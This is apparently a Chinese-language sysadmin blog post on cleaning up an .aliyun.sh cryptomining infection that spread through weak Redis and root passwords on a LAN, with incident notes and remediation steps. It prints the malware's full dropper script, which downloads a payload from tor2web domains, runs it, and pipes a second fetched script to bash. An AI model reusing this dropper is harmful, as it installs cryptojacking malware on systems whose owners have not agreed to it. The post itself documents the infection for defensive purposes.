局域網Linux機器中病毒簡單處理 .aliyun.sh 挖礦病毒 ---不徹底

1. 昨天晚上同事打電話給我說自己的服務器上面的redis無故被清空了,並且查看aof 日志有很多 wget和write指令

一想就是大事不好.局域網中病毒了..

2. 今天早上到公司忙完一陣簡單看了下,就發現了五台機器中病毒. (悲傷無以言表)

3. 現象: CPU暴高, 通過虛擬化控制台就能看到

 

 4. 進入虛擬機簡單查看一下. 使用top 就能看到

 

 5. 最簡單的查看流程. 先看計划任務

crontab -e

 

 

病毒的腳本文件為:

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
t=trumps4c4ohxvq7o
dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
for i in /usr/bin $dir /dev/shm /tmp /var/tmp;do touch $i/i && cd $i && rm -f i && break;done
x() {
f=/int
d=./$(date|md5sum|cut -f1 -d-)
wget -t1 -T10 -qU- --no-check-certificate $1$f -O$d || curl -m10 -fsSLkA- $1$f -o$d
chmod +x $d;$d;rm -f $d
}
u() {
x=/crn
wget -t1 -T10 -qU- -O- --no-check-certificate $1$x || curl -m10 -fsSLkA- $1$x
}
for h in tor2web.io 4tor.ml onion.mn onion.in.net onion.to d2web.org civiclink.network onion.ws onion.nz onion.glass tor2web.su
do
if ! ls /proc/$(cat /tmp/.X11-unix/00)/io; then
x trumps4c4ohxvq7o.$h
else
break
fi
done

if ! ls /proc/$(cat /tmp/.X11-unix/00)/io; then
(
u $t.tor2web.io ||
u $t.4tor.ml ||
u $t.d2web.org ||
u $t.onion.mn ||
u $t.onion.in.net ||
u $t.onion.to ||
u $t.civiclink.network ||
u $t.onion.pet ||
u $t.tor2web.su ||
u $t.onion.glass ||
u $t.onion.ws
)|bash
fi

 

 

中病毒無疑

刪了這條記錄,並且將剛才的哪個進程殺掉.

6.刪除root目錄下的文件

rm -rf /root/.aliyun.sh

7. /usr/bin 目錄下還有別的東西 暫時沒時間看...

8. 暫時關閉cron的服務避免再次被安裝 (周六中午發現沒卵用,)

systemctl disable crond && systemctl stop crond

9. 創建一個.aliyun.sh的文件並且增加上不可修改的權限等 

touch /root/.aliyun.sh
chmod 0000  /root/.aliyun.sh
chattr +i  /root/.aliyun.sh
mv /usr/bin/chattr /usr/bin/fuckchattr

 

10. 初步結論

1. redis 0.0.0.0 弱密碼必須要修改
2.root賬戶的弱密碼口令必須處理 也有沒開redis端口有感染的情況.
3. ssh 互信的機器要關注一下. 

　　

 11. 12.8 凌晨繼續補充

病毒很變態 發現還有一個駐留進程不占CPU ，所以不能僅通過htop來查看進程還要通過pstree來去查找病毒進程

如圖示。

        ├─packagekitd───2*[{packagekitd}]
        ├─pcscd───2*[{pcscd}]
        ├─polkitd───6*[{polkitd}]
        ├─postmaster───7*[postmaster]
        ├─pulseaudio───{pulseaudio}
        ├─rngd
        ├─rpcbind
        ├─rsyslogd───2*[{rsyslogd}]
        ├─rtkit-daemon───2*[{rtkit-daemon}]
        ├─smartd
        ├─sqlservr─┬─sqlservr───152*[{sqlservr}]
        │          └─{sqlservr}
        ├─sshd───sshd───bash───pstree
        ├─systemd-journal
        ├─systemd-logind
        ├─systemd-udevd
        ├─tnslsnr───{tnslsnr}
        ├─tuned───4*[{tuned}]
        ├─udisksd───4*[{udisksd}]
        ├─upowerd───2*[{upowerd}]
        ├─vmtoolsd
        ├─wpa_supplicant
        ├─xdg-permission-───2*[{xdg-permission-}]
        └─y0qYwK

簡單分析一下這個進程。發現 的確會出發新的任務來挖礦，只能先簡單的干掉這個進程。再看看有沒有進程出現。 

二進制文件 直接被刪除掉了很難搞。 

索性將/usr/bin 目錄設置只讀屬性不允許寫入再進行嘗試。 

 

/opt 目錄下面也有aliyun.sh

剛才反查了下域名 四月份到六月份注冊的。 應該是新變種病毒。 

 12. 繼續補充

發現病毒目錄采取了 在/tmp　目錄下面的文件

使用lsof簡單查詢一下到底用到了進程然后殺之

文件路徑為：

/tmp/.X11-unix

 

[root@CentOS77 .X11-unix]# lsof 00
COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF     NODE NAME
EyLyU3  30935 root    0w   REG  253,0        6 74418570 00
[root@CentOS77 .X11-unix]# ll /proc/30935/
total 0

 順便干掉這個目錄繼續觀察

rm -rf /tmp/.X11-unix/